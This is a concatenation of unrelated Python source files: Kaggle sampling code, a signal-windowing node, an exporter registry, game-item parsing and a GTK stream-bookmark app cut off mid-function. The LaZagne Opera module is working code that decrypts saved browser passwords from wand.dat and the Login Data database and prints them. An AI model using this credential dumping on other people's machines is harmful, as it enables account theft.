print('-----LCC Sampling Before All: {} Pos: {} Neg: {}'.format(len(labels), np.sum(labels == 1), np.sum(labels == 0)))
print('-----LCC Sampling After All: {} Pos: {} Neg: {}'.format(len(sample_labels), np.sum(sample_labels == 1), np.sum(sample_labels == 0)))
print('-----LCC Sampling Rate: {}'.format(float(len(sample_labels)) / float(len(labels))))
return sample_data, sample_labels, weight
def neg_sample(input_data, labels, C = 1):
"""
Param:
labels shape: (n_sample,)
preds shape: (n_sample,)
input_data shape: (n_sample, feature_dim)
C: neg_number = C * pos_number
return:
data after sampling
"""
with timer("Negative sampling"):
print('Negative sampling...')
pos_ind = np.where(labels == 1)[0]
neg_ind = np.where(labels == 0)[0]
accept_rate = float(C * len(pos_ind)) / float(len(neg_ind))
neg_select_ind = nrs.choice(neg_ind, len(pos_ind) * C, replace = True)
select_ind = np.append(pos_ind, neg_select_ind)
nrs.shuffle(select_ind)
sample_data = input_data[select_ind, :]
sample_labels = labels[select_ind]
sample_neg_ind = np.where(sample_labels == 0)[0]
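        # Weight each kept negative by the inverse of the sampling rate so
        # the weighted sample still represents the full original negative set.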
weight = np.ones(len(sample_labels))
weight[sample_neg_ind] = 1.0 / accept_rate
print('-----Neg Sampling Before All: {} Pos: {} Neg: {}'.format(len(labels), np.sum(labels == 1), np.sum(labels == 0)))
print('-----Neg Sampling After All: {} Pos: {} Neg: {}'.format(len(sample_labels), np.sum(sample_labels == 1), np.sum(sample_labels == 0)))
print('-----Neg Sampling Rate: {}'.format(float(len(sample_labels)) / float(len(labels))))
return sample_data, sample_labels, weight
| ifuding/Kaggle | TalkingDataFraudDetect/Code/lcc_sample.py | Python | apache-2.0 | 2,613 |
import numpy as np
from matplotlib.mlab import find
from data_transforms import create_weight
def apply_bound(pred, bounds=(0,1,0)):
"""
This ensures that all views and comments >= 0 and all votes >= 1
"""
pred = (pred >= bounds) * pred + bounds * (pred < bounds)
return pred
def apply_scales(pred, categories, scales):
"""
Applies scales to a prediction given a dict containing scales indexed
by category name and a list of categories
len(categories) == pred.shape[0]
"""
weights = create_weight(categories, scales)
return apply_bound(pred * weights)
| beegieb/kaggle_see_click_fix | predict.py | Python | bsd-3-clause | 608 |
import sys, struct, hashlib, binascii, re, os
from Crypto.Cipher import DES3
from ConfigParser import RawConfigParser
import sqlite3, win32crypt
from config.constant import *
from config.write_output import print_output, print_debug
from config.header import Header
from config.moduleInfo import ModuleInfo
CIPHERED_FILE = ''
class Opera(ModuleInfo):
def __init__(self):
options = {'command': '-o', 'action': 'store_true', 'dest': 'opera', 'help': 'opera'}
ModuleInfo.__init__(self, 'opera', 'browsers', options)
def run(self):
# print title
Header().title_info('Opera')
# retrieve opera folder
path = self.get_path()
if path == 'env_variable_error':
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
return
elif not path:
print_debug('INFO', 'Opera is not installed.')
return
passwords = ''
# old versions
if CIPHERED_FILE == 'wand.dat':
# check the use of master password
if not os.path.exists(path + os.sep + 'operaprefs.ini'):
print_debug('WARNING', 'The preference file operaprefs.ini has not been found.')
return
else:
if self.masterPasswordUsed(path) == '1':
print_debug('WARNING', 'A master password is used.')
elif self.masterPasswordUsed(path) != '0':
print_debug('ERROR', 'An error occurs, the use of master password is not sure.')
passwords = self.decipher_old_version(path)
if passwords:
self.parse_results(passwords)
else:
print_debug('INFO', 'The wand.dat seems to be empty')
# new versions
else:
passwords = self.decipher_new_version(path)
def get_path(self):
global CIPHERED_FILE
if 'APPDATA' in os.environ:
# version less than 10
if os.path.exists(os.environ['APPDATA'] + '\Opera\Opera\profile'):
CIPHERED_FILE = 'wand.dat'
return os.environ['APPDATA'] + '\Opera\Opera\profile'
# version more than 10
if os.path.exists(os.environ['APPDATA'] + '\Opera\Opera'):
CIPHERED_FILE = 'wand.dat'
return os.environ['APPDATA'] + '\Opera\Opera'
# new versions
elif os.path.exists(os.environ['APPDATA'] + '\Opera Software\Opera Stable'):
CIPHERED_FILE = 'Login Data'
return os.environ['APPDATA'] + '\Opera Software\Opera Stable'
else:
return None
else:
return 'env_variable_error'
def decipher_old_version(self, path):
salt = '837DFC0F8EB3E86973AFFF'
# retrieve wand.dat file
if not os.path.exists(path + os.sep + 'wand.dat'):
print_debug('WARNING', 'wand.dat file has not been found.')
return
# read wand.dat
f = open(path + os.sep + 'wand.dat', 'rb')
file = f.read()
fileSize = len(file)
passwords = []
offset = 0
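        # Walk wand.dat record by record: each 0x08 marker is followed by
        # 8 bytes of key material, a 4-byte big-endian length and the
        # 3DES-encrypted blob of that length.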
while offset < fileSize:
offset = file.find('\x08', offset) + 1
if offset == 0:
break
tmp_blockLength = offset - 8
tmp_datalen = offset + 8
blockLength = struct.unpack('!i', file[tmp_blockLength : tmp_blockLength + 4])[0]
datalen = struct.unpack('!i', file[tmp_datalen : tmp_datalen + 4])[0]
binary_salt = binascii.unhexlify(salt)
desKey = file[offset: offset + 8]
tmp = binary_salt + desKey
md5hash1 = hashlib.md5(tmp).digest()
md5hash2 = hashlib.md5(md5hash1 + tmp).digest()
key = md5hash1 + md5hash2[0:8]
iv = md5hash2[8:]
data = file[offset + 8 + 4: offset + 8 + 4 + datalen]
des3dec = DES3.new(key, DES3.MODE_CBC, iv)
plaintext = des3dec.decrypt(data)
plaintext = re.sub(r'[^\x20-\x7e]', '', plaintext)
passwords.append(plaintext)
offset += 8 + 4 + datalen
return passwords
def decipher_new_version(self, path):
database_path = path + os.sep + 'Login Data'
if os.path.exists(database_path):
# Connect to the Database
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
return
pwdFound = []
for result in cursor.fetchall():
values = {}
# Decrypt the Password
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
# print the results
print_output("Opera", pwdFound)
else:
            print_debug('INFO', 'No passwords stored\nThe database Login Data is not present.')
def masterPasswordUsed(self, path):
# the init file is not well defined so lines have to be removed before to parse it
cp = RawConfigParser()
f = open(path + os.sep + 'operaprefs.ini', 'rb')
f.readline() # discard first line
while 1:
try:
cp.readfp(f)
break
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
f.readline() # discard first line
try:
master_pass = cp.get('Security Prefs','Use Paranoid Mailpassword')
return master_pass
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return False
def parse_results(self, passwords):
cpt = 0
values = {}
pwdFound = []
for password in passwords:
# date (begin of the sensitive data)
match=re.search(r'(\d+-\d+-\d+)', password)
if match:
values = {}
cpt = 0
tmp_cpt = 0
# after finding 2 urls
if cpt == 2:
tmp_cpt += 1
if tmp_cpt == 2:
values['User'] = password
print 'User:' + password
elif tmp_cpt == 4:
values['Password'] = password
# url
match=re.search(r'^http', password)
if match:
cpt +=1
if cpt == 1:
tmp_url = password
elif cpt == 2:
values['URL'] = tmp_url
pwdFound.append(values)
# print the results
print_output("Opera", pwdFound)
| Relin/LaZagne | Windows/src/LaZagne/softwares/browsers/opera.py | Python | lgpl-3.0 | 5,849 |
import logging
import os
class Exporter(object):
def __init__(self, options=None):
self.options = options
self.logger = logging.getLogger(__name__)
self.setup()
def setup(self):
pass
exporters = {}
def register_exporter(klass):
exporters[klass.name] = klass
return klass
def get_exporters():
if exporters:
return exporters
for fname in os.listdir(os.path.dirname(__file__)):
module, ext = os.path.splitext(fname)
if ext.lower() != '.py':
continue
if module in ('__init__', 'base'):
continue
full_path = "%s.%s" % (__package__, module)
ret = __import__(full_path, locals(), globals())
return exporters
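# Hypothetical usage sketch (module and class names are illustrative only):
# an exporter module placed in this package registers itself with the
# decorator above and is picked up by get_exporters() when it is imported.
#
#     @register_exporter
#     class CSVExporter(Exporter):
#         name = 'csv'
#
#         def setup(self):
#             self.logger.info('csv exporter ready')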
| City-of-Helsinki/linkedevents | events/exporter/base.py | Python | mit | 742 |
# =============================================================================
# Copyright (C) 2014 Ryan Holmes
#
# This file is part of pyfa.
#
# pyfa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyfa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyfa. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
import re
from eos.db.gamedata.queries import getAttributeInfo, getDynamicItem
from eos.utils.float import floatUnerr
from service.port.shared import fetchItem
from service.esiAccess import EsiAccess
def renderMutant(mutant, firstPrefix='', prefix=''):
exportLines = []
mutatedAttrs = {}
for attrID, mutator in mutant.mutators.items():
attrName = getAttributeInfo(attrID).name
mutatedAttrs[attrName] = mutator.value
exportLines.append('{}{}'.format(firstPrefix, mutant.baseItem.name))
exportLines.append('{}{}'.format(prefix, mutant.mutaplasmid.item.name))
customAttrsLine = ', '.join(
'{} {}'.format(a, floatUnerr(mutatedAttrs[a]))
for a in sorted(mutatedAttrs))
exportLines.append('{}{}'.format(prefix, customAttrsLine))
return '\n'.join(exportLines)
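# The text block produced above (and, modulo the prefixes, what parseMutant
# below expects) has the shape:
#   <base item name>
#   <mutaplasmid item name>
#   <attribute name> <value>, <attribute name> <value>, ...
# with the attribute pairs sorted alphabetically by attribute name.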
def parseMutant(lines):
# Fetch base item type
try:
baseItemName = lines[0]
except IndexError:
        return None, None, {}
baseItem = fetchItem(baseItemName.strip())
if baseItem is None:
return None, None, {}
# Fetch mutaplasmid item type and actual item
try:
mutaplasmidName = lines[1]
except IndexError:
return baseItem, None, {}
mutaplasmidItem = fetchItem(mutaplasmidName.strip())
if mutaplasmidItem is None:
return baseItem, None, {}
mutaplasmidItem = getDynamicItem(mutaplasmidItem.ID)
# Process mutated attribute values
try:
mutationsLine = lines[2]
except IndexError:
return baseItem, mutaplasmidItem, {}
mutations = {}
pairs = [p.strip() for p in mutationsLine.split(',')]
for pair in pairs:
try:
attrName, value = pair.split(' ')
except ValueError:
continue
try:
value = float(value)
except (ValueError, TypeError):
continue
attrInfo = getAttributeInfo(attrName.strip())
if attrInfo is None:
continue
mutations[attrInfo.ID] = value
return baseItem, mutaplasmidItem, mutations
def parseDynamicItemString(text):
m = re.search(r'<url=showinfo:(?P<typeid>\d+)//(?P<itemid>\d+)>.+</url>', text)
if m:
typeID = int(m.group('typeid'))
itemID = int(m.group('itemid'))
return typeID, itemID
return None
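# Example of a string the regex above accepts (both IDs are made up):
#   '<url=showinfo:12345//1000000000001>Abyssal Module</url>'
# which yields the tuple (12345, 1000000000001).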
def fetchDynamicItem(dynamicItemData):
typeID, itemID = dynamicItemData
esiData = EsiAccess().getDynamicItem(typeID, itemID).json()
baseItemID = esiData['source_type_id']
mutaplasmidID = esiData['mutator_type_id']
attrs = {i['attribute_id']: i['value'] for i in esiData['dogma_attributes']}
baseItem = fetchItem(baseItemID)
mutaplasmid = getDynamicItem(mutaplasmidID)
return baseItem, mutaplasmid, attrs
| pyfa-org/Pyfa | service/port/muta.py | Python | gpl-3.0 | 3,576 |
""" Multiply a signal with a window """
import warnings
import numpy
# These imports are all for loading the functions.yaml file for the abbreviations of functions for benchmarking.
# Kept here local for debugging and because the file is just used in this node.
# Maybe this will change.
try:
import os
import yaml
import pySPACE
except:
pass
from pySPACE.missions.nodes.base_node import BaseNode
from pySPACE.resources.data_types.time_series import TimeSeries
class InvalidWindowException(Exception):
pass
class WindowFuncNode(BaseNode):
""" Multiply the :class:`~pySPACE.resources.data_types.time_series.TimeSeries` with a window
If the window has trailing zeros, the time series is chopped.
**Parameters**
:window_function_str:
This string has to be either the name of a function specified in
functions.yaml or a lambda expression that evaluates to a valid
window function. Such a window function has to be of the form
lambda n: lambda x: something
where n is the number of samples (the length of the window
function) and x is the respective value.
:reduce_window:
If True, zeros at the beginning or ending are chopped.
(*optional, default: False*)
**Exemplary call**
.. code-block:: yaml
-
node : Windowing
parameters :
window_function_str : "hanning" # loaded from functions.yaml
:Author: Jan Hendrik Metzen ([email protected])
:Created: 2008/09/01
:Revised: 2009/09/15 (Mario Krell)
"""
def __init__(self, window_function_str, reduce_window = False, **kwargs):
super(WindowFuncNode, self).__init__(**kwargs)
# Do the import of the abbreviations of the functions.
if not window_function_str.startswith("lambda"):
try:
functions_file = open(os.path.join(pySPACE.configuration.spec_dir,
'functions.yaml'), 'r')
functions = yaml.load(functions_file)
functions_file.close()
except AttributeError:
# Running outside of pySPACE, not able to load functions from YAML file
# TODO: Fix that
functions = {}
warnings.warn("Function in spec folder could not be loaded. Please fix that!")
try:
window_function_str = functions[window_function_str]
except KeyError:
# window_function_str is not the key for a function in functions.yaml,
# we assume that it is the window function itself
pass
self.set_permanent_attributes(window_function_str = window_function_str,
reduce_window = reduce_window,
num_of_samples = None,
window_array = None)
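    # Illustrative window string (an assumption, not an entry from
    # functions.yaml): a Hann window in the expected two-level lambda form;
    # `numpy` is resolvable when the string is evaluated in this module.
    #   "lambda n: lambda x: 0.5 - 0.5 * numpy.cos(2 * numpy.pi * x / (n - 1))"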
def create_window_array(self):
""" Create a permanent array for the windowing of the data"""
# the window is given as a lambda expression where the first variable
# is the length of the window (num of samples of the data) and the
# second one is for the time axis
# resolve first variable
window_function = eval(self.window_function_str)(self.num_of_samples)
# resolve second variable for final window creation
self.window_array = numpy.array([window_function(i) for i in \
range(self.num_of_samples)])
# Check if there are zeros at the beginning or end of window
# If yes, skip these ranges (i.e. shorten the time series window)
self.window_not_equal_zero = numpy.where(self.window_array != 0)[0]
self.window_has_zeros = (len(self.window_not_equal_zero) != \
self.num_of_samples)
# A window with only zeros does not make sense
if len(self.window_not_equal_zero) == 0:
raise InvalidWindowException("The window does contain only zeros!")
def _execute(self, data):
""" Apply the windowing to the given data and return the result """
#Create a window of the correct length for the given data
if self.num_of_samples is None:
self.num_of_samples = data.shape[0]
self.create_window_array()
data_array=data.view(numpy.ndarray)
#Do the actual windowing
# TODO: check if windowed_data = (self.window_array.T * data) works also???
windowed_data = (self.window_array * data_array.T).T
# Skip trailing zeros
if self.window_has_zeros and self.reduce_window:
windowed_data = windowed_data[
range(self.window_not_equal_zero[0],
self.window_not_equal_zero[-1] + 1), :]
result_time_series = TimeSeries.replace_data(data, windowed_data)
# Adjust start and end time when chopping was done
result_time_series.start_time = data.start_time + \
self.window_not_equal_zero[0] * 1000.0 / data.sampling_frequency
result_time_series.end_time = \
data.end_time - (data.shape[0] - self.window_not_equal_zero[-1]
- 1) * 1000.0 / data.sampling_frequency
else:
result_time_series = TimeSeries.replace_data(data, windowed_data)
return result_time_series
class ScaleNode(BaseNode):
""" Scale all value by a constant factor
Scales (i.e. multiplies) all values with a given factor.
**Parameters**
:factor:
The factor
**Exemplary Call**
.. code-block:: yaml
-
node : Scale
parameters :
factor : 2
:Authors: Hendrik Woehrle ([email protected])
:Created: 2013/03/08
"""
def __init__(self,
factor=1,
**kwargs):
super(ScaleNode, self).__init__(**kwargs)
if type(factor) == str:
factor = eval(factor)
self.set_permanent_attributes(factor=factor)
def _execute(self, data):
"""
Apply the scaling to the given data x
and return a new time series.
"""
x = data.view(numpy.ndarray).astype(numpy.double)
x = x * self.factor
result_time_series = TimeSeries.replace_data(data, x)
return result_time_series
_NODE_MAPPING = {"Windowing": WindowFuncNode,
} | pyspace/test | pySPACE/missions/nodes/preprocessing/window_func.py | Python | gpl-3.0 | 6,789 |
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, Gdk
from os import path, makedirs
import re
import traceback
from subprocess import Popen, PIPE, DEVNULL
from station import Station
from constants import RE_URL
from tools import get_metadata, get_next_url
from drag import drag
from db import DataBase
from commands import CommandsMenu
class MainWindow:
def __init__(self, application):
self.application = application
self.edit = False
self.filter = False
self.locked = True
self.builder = Gtk.Builder()
glade_path = "{}/streams.glade".format(path.dirname(__file__))
self.builder.add_from_file(glade_path)
self.window = self.builder.get_object("main_win")
self.window.set_wmclass("Streams", "Streams")
self.window.set_title("Streams")
self.window.connect("delete-event", self.exit)
menu_com = self.builder.get_object("menu_command")
self.commands_menu = CommandsMenu(self)
menu_com.set_popup(self.commands_menu)
events = {
"on_selection_change": self.on_selection_change,
"on_activation": self.on_activation,
"on_add_clicked": self.on_add_clicked,
"on_edit_clicked": self.on_edit,
"on_delete_clicked": self.on_delete,
"on_save_clicked": self.on_save,
"on_cancel_clicked": self.on_cancel,
"on_dig_clicked": self.on_dig,
"on_auto_clicked": self.on_autofill,
"on_url_change": self.dig_button_state,
"on_web_change": self.web_button_state,
"on_web_clicked": self.visit_web,
"on_menuchoice_save_activate": self.commands_menu.add,
"on_menuchoice_delete_activate": self.commands_menu.delete,
"on_command_menu_activated": self.commands_menu.activated,
"on_menu_item_export_activate": self.on_export,
"on_menu_item_addurl_activate": self.add_url,
"on_menu_item_addfold_activate": self.add_folder,
"on_menu_item_openfile_activate": self.add_file,
"on_menu_item_export_folder_activate": self.on_export_folder,
"on_entry_filter_changed": self.filter_change,
"on_view_bookmarks_drag_drop": self.on_drag_drop,
"on_menu_item_filter_list_toggled": self.filter_toggle
}
self.builder.connect_signals(events)
self.db = DataBase(str, str, str, str, str, str, str, bool, int)
self.db.load()
self.tree_filter = self.db.filter_new(None)
self.entry_filter = self.builder.get_object("entry_filter")
self.tree_filter.set_visible_func(self.filter_func)
self.treeview = self.builder.get_object("view_bookmarks")
self.treeview.set_model(self.tree_filter)
self.treeview.enable_model_drag_source(Gdk.ModifierType.BUTTON1_MASK,
[("list_row", Gtk.TargetFlags.SAME_WIDGET, 0)],
Gdk.DragAction.MOVE)
self.treeview.enable_model_drag_dest([("list_row", Gtk.TargetFlags.SAME_WIDGET, 0)],
Gdk.DragAction.MOVE)
self.selection = self.builder.get_object("bookmarks_view_selection")
self.restore_state()
self.window.set_application(application)
self.window.show_all()
self.locked = False
def open(self, files):
for f in files:
scheme = f.get_uri_scheme()
location = f.get_parse_name()
if scheme == "http" or scheme == "https":
self.create_station(location)
elif scheme == "file":
self.add_from_file(location)
else:
self.popup("couldn't determine if file or url.")
def on_selection_change(self, selection):
model, treeiter = selection.get_selected()
grid = self.builder.get_object("info_grid")
actions = self.builder.get_object("box_actions")
edit = self.builder.get_object("box_edit")
if treeiter is None:
grid.set_visible(False)
actions.set_visible(False)
edit.set_visible(False)
else:
grid.set_visible(True)
actions.set_visible(True)
self.edit_mode(False)
self.load_selection_data()
return
def filter_change(self, entry):
self.tree_filter.refilter()
def filter_toggle(self, item):
self.filter = item.get_active()
self.entry_filter.set_visible(self.filter)
if self.filter:
self.entry_filter.grab_focus()
self.tree_filter.refilter()
def filter_func(self, model, treeiter, data):
row = model.get(treeiter, 0, 2, 7)
match = self.entry_filter.get_text()
title = row[0]
genres = row[1]
folder = row[2]
if row[0] is None:
return False
if re.search(match, title, re.IGNORECASE)\
or (genres is not None and re.search(match, genres, re.IGNORECASE)) \
or folder \
or not self.filter:
return True
else:
return False
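    # The command entry acts as a template: "{}" is replaced by the station
    # URL and the result is split once into program and argument string. A
    # hypothetical entry "mpv --no-video {}" therefore runs
    # Popen(["mpv", "--no-video http://stream.example/live"]).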
def on_activation(self, text, path, column):
if self.tree_filter[path][7]:
return
url = self.tree_filter[path][1]
cmd = text.get_text().format(url)
cmd = cmd.split(" ", 1)
try:
Popen([cmd[0], cmd[1]],
shell=False,
stdout=PIPE,
stderr=DEVNULL)
except Exception as err:
traceback.print_exc()
self.popup(err)
return
def on_add_clicked(self, button):
choice_dial = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
("Station", 1, "Folder", 2),
"Do you want to add a station or a folder ?")
choice_dial.set_default_response(1)
choice = choice_dial.run()
choice_dial.destroy()
if choice == 1:
self.add_url()
elif choice == 2:
self.add_folder()
return
def add_url(self, widget=None):
dialog = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"Enter the new station's URL"
)
text_new_url = Gtk.Entry(input_purpose=Gtk.InputPurpose.URL)
text_new_url.set_activates_default(Gtk.ResponseType.OK)
dialog.set_default_response(Gtk.ResponseType.OK)
area = dialog.get_content_area()
area.add(text_new_url)
text_new_url.show()
new_url = ""
response = dialog.run()
if response == Gtk.ResponseType.OK:
new_url = text_new_url.get_text()
dialog.destroy()
if RE_URL.match(new_url):
self.create_station(new_url)
else:
self.popup("Invalid URL")
return
def add_file(self, widget=None):
dial = Gtk.FileChooserDialog("Choose file to open",
self.window,
Gtk.FileChooserAction.OPEN,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OPEN, Gtk.ResponseType.OK
))
filt = Gtk.FileFilter()
filt.set_name("Playlists")
filt.add_pattern("*.pls")
filt.add_pattern("*.m3u")
filt.add_pattern("*.xspf")
dial.add_filter(filt)
filt = Gtk.FileFilter()
filt.set_name("All")
filt.add_pattern("*")
dial.add_filter(filt)
response = dial.run()
file = dial.get_filename()
dial.destroy()
if response == Gtk.ResponseType.OK:
self.add_from_file(file)
def add_from_file(self, location):
if self.locked:
print("Locked")
return
self.locked = True
self.application.mark_busy()
win_wait = self.pls_wait()
while Gtk.events_pending():
Gtk.main_iteration()
try:
Station(self, location, None, True)
except Exception as err:
traceback.print_exc()
win_wait.destroy()
self.popup(err)
self.locked = False
self.application.unmark_busy()
else:
win_wait.destroy()
self.db.save()
self.locked = False
self.application.unmark_busy()
return
def add_folder(self, widget=None):
dialog = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"Enter the new folder's name"
)
text_fold = Gtk.Entry()
text_fold.set_activates_default(Gtk.ResponseType.OK)
text_fold.show()
area = dialog.get_content_area()
area.add(text_fold)
fol_name = ""
response = dialog.run()
if response == Gtk.ResponseType.OK:
fol_name = text_fold.get_text()
dialog.destroy()
if fol_name != "":
self.db.add_folder(fol_name)
self.db.save()
return
def create_station(self, url, parent=None):
if self.locked:
print("Locked")
return
self.application.mark_busy()
self.locked = True
win_wait = self.pls_wait()
while Gtk.events_pending():
Gtk.main_iteration()
try:
Station(self, url, parent)
except Exception as err:
traceback.print_exc()
win_wait.destroy()
self.popup(err)
self.locked = False
self.application.unmark_busy()
else:
self.db.save()
win_wait.destroy()
self.locked = False
self.application.unmark_busy()
return
def on_edit(self, button):
self.edit_mode(True)
return
def on_delete(self, text):
name = text.get_text()
dialog = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"Delete {} ?".format(name))
dialog.set_default_response(Gtk.ResponseType.OK)
response = dialog.run()
dialog.destroy()
if response != Gtk.ResponseType.OK:
return
f_row = self.selection.get_selected()[1]
db_row = self.tree_filter.convert_iter_to_child_iter(f_row)
self.db.remove(db_row)
self.db.save()
return
def on_save(self, button):
row = self.selection.get_selected()[1]
if row is None:
return
name = self.builder.get_object("text_name").get_text()
url = self.builder.get_object("text_url").get_text()
genres = self.builder.get_object("text_genres").get_text()
web = self.builder.get_object("text_web").get_text()
codec = self.builder.get_object("text_codec").get_text()
bitrate = self.builder.get_object("text_bitrate").get_text()
sample = self.builder.get_object("text_sample").get_text()
if name == "":
name = url
self.tree_filter.set_value(row, 0, name)
self.tree_filter.set_value(row, 1, url)
self.tree_filter.set_value(row, 2, genres)
self.tree_filter.set_value(row, 3, web)
self.tree_filter.set_value(row, 4, codec)
self.tree_filter.set_value(row, 5, bitrate)
self.tree_filter.set_value(row, 6, sample)
self.db.save()
self.edit_mode(False)
return
def on_cancel(self, button):
self.edit_mode(False)
self.load_selection_data()
return
def on_dig(self, text):
url = text.get_text()
try:
new_url = get_next_url(self, url)
except Exception as err:
traceback.print_exc()
self.popup(err)
return
if type(new_url) is str:
text.set_text(new_url)
elif type(new_url) is tuple:
if len(new_url[1]) == 1:
text.set_text(new_url[1][0])
else:
if new_url[0] is not None:
parent = self.db.add_folder(new_url[0])
else:
parent = None
for url in new_url[1]:
self.create_station(url, parent)
self.edit_mode(False)
self.load_selection_data()
self.popup("Multiple stations added,\nsource station has not been changed")
return
def on_autofill(self, text):
self.application.mark_busy()
self.locked = True
win_wait = self.pls_wait()
while Gtk.events_pending():
Gtk.main_iteration()
url = text.get_text()
try:
data = get_metadata(url)
except Exception as err:
traceback.print_exc()
win_wait.destroy()
self.application.unmark_busy()
self.locked = False
self.popup(err)
else:
self.builder.get_object("text_name").set_text(data[0])
self.builder.get_object("text_url").set_text(url)
self.builder.get_object("text_genres").set_text(data[2])
self.builder.get_object("text_web").set_text(data[3])
self.builder.get_object("text_codec").set_text(data[4])
self.builder.get_object("text_bitrate").set_text(data[5])
self.builder.get_object("text_sample").set_text(data[6])
win_wait.destroy()
self.locked = False
self.application.unmark_busy()
return
def edit_mode(self, state):
self.edit = state
model, iter = self.selection.get_selected()
button_auto = self.builder.get_object("button_auto")
button_auto.set_sensitive(not model[iter][7])
self.builder.get_object("box_edit").set_visible(state)
self.builder.get_object("box_actions").set_visible(not state)
self.builder.get_object("text_name").set_editable(state)
self.builder.get_object("text_url").set_editable(state)
self.builder.get_object("text_genres").set_editable(state)
self.builder.get_object("text_web").set_editable(state)
self.builder.get_object("text_codec").set_editable(state)
self.builder.get_object("text_bitrate").set_editable(state)
self.builder.get_object("text_sample").set_editable(state)
entry = self.builder.get_object("text_url")
self.dig_button_state(entry)
return
def dig_button_state(self, entry):
row, cursor = self.selection.get_selected()
state = self.edit and not row[cursor][7]
if state:
self.builder.get_object("info_grid").child_set_property(entry, "width", 1)
else:
self.builder.get_object("info_grid").child_set_property(entry, "width", 2)
self.builder.get_object("button_dig").set_visible(state)
return
def web_button_state(self, entry):
url = entry.get_text()
state = RE_URL.match(url)
if state is None:
state = False
if state:
self.builder.get_object("info_grid").child_set_property(entry, "width", 1)
else:
self.builder.get_object("info_grid").child_set_property(entry, "width", 2)
self.builder.get_object("button_web").set_visible(state)
return
@staticmethod
def visit_web(text):
url = text.get_text()
Popen(["xdg-open", url],
shell=False,
stdout=PIPE,
stderr=DEVNULL)
return
def load_selection_data(self):
model, treeiter = self.selection.get_selected()
if treeiter is None:
return
text_name = self.builder.get_object("text_name")
# text_label = self.builder.get_object("label_name")
text_url = self.builder.get_object("text_url")
label_url = self.builder.get_object("label_url")
text_genres = self.builder.get_object("text_genres")
label_genres = self.builder.get_object("label_genres")
text_web = self.builder.get_object("text_web")
label_web = self.builder.get_object("label_web")
text_codec = self.builder.get_object("text_codec")
label_codec = self.builder.get_object("label_codec")
text_bitrate = self.builder.get_object("text_bitrate")
label_bitrate = self.builder.get_object("label_bitrate")
text_sample = self.builder.get_object("text_sample")
label_sample = self.builder.get_object("label_sample")
button_dig = self.builder.get_object("button_dig")
button_web = self.builder.get_object("button_web")
name = model[treeiter][0]
text_name.set_text(name)
visible = not model[treeiter][7]
text_url.set_visible(visible)
label_url.set_visible(visible)
text_genres.set_visible(visible)
label_genres.set_visible(visible)
text_web.set_visible(visible)
label_web.set_visible(visible)
text_codec.set_visible(visible)
label_codec.set_visible(visible)
text_bitrate.set_visible(visible)
label_bitrate.set_visible(visible)
text_sample.set_visible(visible)
label_sample.set_visible(visible)
button_dig.set_visible(visible)
button_web.set_visible(visible)
export_folder_menu = self.builder.get_object("menu_item_export_folder")
if not model[treeiter][7]:
url = model[treeiter][1]
genres = model[treeiter][2]
web = model[treeiter][3]
codec = model[treeiter][4]
bitrate = model[treeiter][5]
sample = model[treeiter][6]
export_folder_menu.set_sensitive(False)
else:
url = ""
genres = ""
web = ""
codec = ""
bitrate = ""
sample = ""
export_folder_menu.set_sensitive(True)
text_url.set_text(url)
text_genres.set_text(genres)
text_web.set_text(web)
text_codec.set_text(codec)
text_bitrate.set_text(bitrate)
text_sample.set_text(sample)
return
def exit(self, a, b):
self.write_state()
return
def write_state(self):
x = self.window.get_size()[0]
y = self.window.get_size()[1]
pane = self.builder.get_object("panel").get_property("position")
maximised = self.window.is_maximized()
cmd = self.builder.get_object("text_command").get_text()
cache_file = path.expanduser("~/.cache/streams/streams")
if not path.exists(path.dirname(cache_file)):
makedirs(path.dirname(cache_file))
file = open(cache_file, 'w')
file.write("{}\n".format(str(x)))
file.write("{}\n".format(str(y)))
file.write("{}\n".format(str(pane)))
file.write("{}\n".format(str(maximised)))
file.write("{}\n".format(str(cmd)))
file.close()
return
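    # Cache file layout written above and read back by restore_state below,
    # one value per line: window width, window height, pane position,
    # maximized flag ("True"/"False") and the command template.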
def restore_state(self):
cache_file = path.expanduser("~/.cache/streams/streams")
if not path.exists(cache_file):
return
file = open(cache_file, 'r')
x = int(file.readline())
y = int(file.readline())
pane = int(file.readline())
maxi = file.readline()
cmd = file.readline()
file.close()
self.window.resize(x, y)
self.builder.get_object("panel").set_position(pane)
        if maxi.strip() == "True":
self.window.maximize()
self.builder.get_object("text_command").set_text(cmd[:-1])
return
def popup(self, err, msg_type=Gtk.MessageType.ERROR):
dialog = Gtk.MessageDialog(self.window,
(Gtk.DialogFlags.MODAL|Gtk.DialogFlags.DESTROY_WITH_PARENT),
msg_type,
Gtk.ButtonsType.CLOSE,
err)
dialog.set_default_response(Gtk.ResponseType.CLOSE)
dialog.run()
dialog.destroy()
return
def pls_wait(self):
win = Gtk.Window()
win.set_default_size(100, 50)
